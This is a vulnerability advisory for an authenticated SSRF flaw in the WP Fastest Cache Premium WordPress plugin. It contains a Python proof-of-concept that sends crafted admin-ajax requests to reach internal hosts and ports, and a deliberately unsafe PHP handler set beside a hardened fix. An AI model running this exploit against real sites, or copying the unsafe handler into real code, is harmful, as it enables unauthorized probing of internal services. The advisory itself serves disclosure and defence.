Security Vulnerability Report
CVE-2025-10583 CVSS 3.5 LOW

Published: 2025-12-12 08:15:47
Last Modified: 2026-04-15 15:16:41

Description

The WP Fastest Cache Premium plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.7.4 via the 'get_server_time_ajax_request' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The free version is not affected.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected product, per the description:

WP Fastest Cache Premium <= 1.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-10583 PoC - WP Fastest Cache Premium SSRF Vulnerability
# Target: WordPress site with WP Fastest Cache Premium <= 1.7.4


def exploit_ssrf(target_url, wp_path='/', target_internal_host='127.0.0.1', target_port=80):
    """
    Exploit SSRF in WP Fastest Cache Premium's get_server_time_ajax_request AJAX action

    Args:
        target_url: Target WordPress site URL
        wp_path: WordPress installation path
        target_internal_host: Internal host to target (default: 127.0.0.1)
        target_port: Internal port to target (default: 80)
    """
    # Construct the AJAX endpoint URL. Slashes are normalised so that both
    # wp_path='/' and wp_path='/blog/' produce a correctly separated URL
    # (the original concatenation dropped the slash before wp-admin).
    base = target_url.rstrip('/')
    path = wp_path.strip('/')
    ajax_url = f"{base}/{path + '/' if path else ''}wp-admin/admin-ajax.php"

    # Construct SSRF payload targeting internal service
    # Using http:// scheme to force HTTP request to internal host
    ssrf_url = f"http://{target_internal_host}:{target_port}"

    # Prepare POST data
    data = {
        'action': 'get_server_time_ajax_request',
        'url': ssrf_url,  # SSRF payload - attacker controlled URL
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}")
    print(f"[*] SSRF Target: {ssrf_url}")

    try:
        # Send request with subscriber-level authentication
        # Note: Requires valid subscriber session cookie
        response = requests.post(ajax_url, data=data, timeout=10, verify=False)

        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)} bytes")

        if response.status_code == 200:
            print("[+] Request successful - SSRF vulnerability confirmed")
            print(f"[>] Response snippet: {response.text[:200]}...")
            return True
        else:
            print("[-] Request failed")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def scan_internal_port(target_url, internal_host, port):
    """Scan internal port via SSRF"""
    return exploit_ssrf(target_url, '/', internal_host, port)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [internal_host] [port]")
        print(f"Example: python {sys.argv[0]} https://example.com 127.0.0.1 8080")
        sys.exit(1)

    target = sys.argv[1]
    host = sys.argv[2] if len(sys.argv) > 2 else '127.0.0.1'
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 80

    exploit_ssrf(target, '/', host, port)
```
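The defensive counterpart of the pattern this advisory describes (an admin-ajax action reachable by any logged-in user that fetches a client-supplied URL, CWE-862 plus SSRF), as an added, hypothetical illustration that is not WP Fastest Cache Premium's code: the weak handler shape is shown beside a hardened one built on WordPress core APIs. The function names, the `manage_options` capability, the nonce action, the `url`/`nonce` parameter names and the allowlisted host are assumptions; only the `get_server_time_ajax_request` hook name comes from the CVE text.

```php
<?php
// Hypothetical illustration for CVE-2025-10583; NOT the plugin's actual code.

// Weak pattern: every wp_ajax_* action is reachable by any authenticated user
// (Subscriber and up), and the handler fetches whatever URL the client sent.
// There is no capability check, no nonce, and no destination validation.
function wpfc_demo_server_time_unsafe() {
    $url      = isset( $_POST['url'] ) ? wp_unslash( $_POST['url'] ) : '';
    $response = wp_remote_get( $url ); // client controls the server-side request
    wp_send_json_success( wp_remote_retrieve_body( $response ) );
}
// add_action( 'wp_ajax_get_server_time_ajax_request', 'wpfc_demo_server_time_unsafe' );

// Hardened form: authorization, CSRF nonce, fixed destination, and a fetch
// helper that rejects loopback/private hosts and non-standard ports.
function wpfc_demo_server_time_safe() {
    // 1. Authorization: only administrators may trigger a server-side request.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: nonce created with wp_create_nonce( 'wpfc_demo_server_time' ) in admin JS.
    check_ajax_referer( 'wpfc_demo_server_time', 'nonce' );

    // 3. The destination is never taken from the request. It is fixed in code
    //    (constructed host) and still checked against an allowlist as defence in depth.
    $allowed_hosts = array( 'api.example.com' );
    $url           = 'https://api.example.com/time';
    $host          = wp_parse_url( $url, PHP_URL_HOST );
    if ( ! in_array( $host, $allowed_hosts, true ) || ! wp_http_validate_url( $url ) ) {
        wp_send_json_error( 'destination not allowed', 400 );
    }

    // 4. wp_safe_remote_get() validates scheme, host and port before connecting
    //    (wp_remote_get() does not); redirects are disabled to avoid bounce-through.
    $response = wp_safe_remote_get( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) ) {
        wp_send_json_error( 'upstream error', 502 );
    }
    wp_send_json_success( array( 'server_time' => wp_remote_retrieve_body( $response ) ) );
}
add_action( 'wp_ajax_get_server_time_ajax_request', 'wpfc_demo_server_time_safe' );
```

For site owners the fix is updating past 1.7.4; the snippet shows plugin developers which three checks the AJAX layer needs before any server-side fetch.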

References

https://research.cleantalk.org/2025-10583
https://research.cleantalk.org/cve-2025-10583/
https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e64c54-a78f-454a-a9ee-02f64b6ae83d?source=cve
https://www.wpfastestcache.com/changelog/
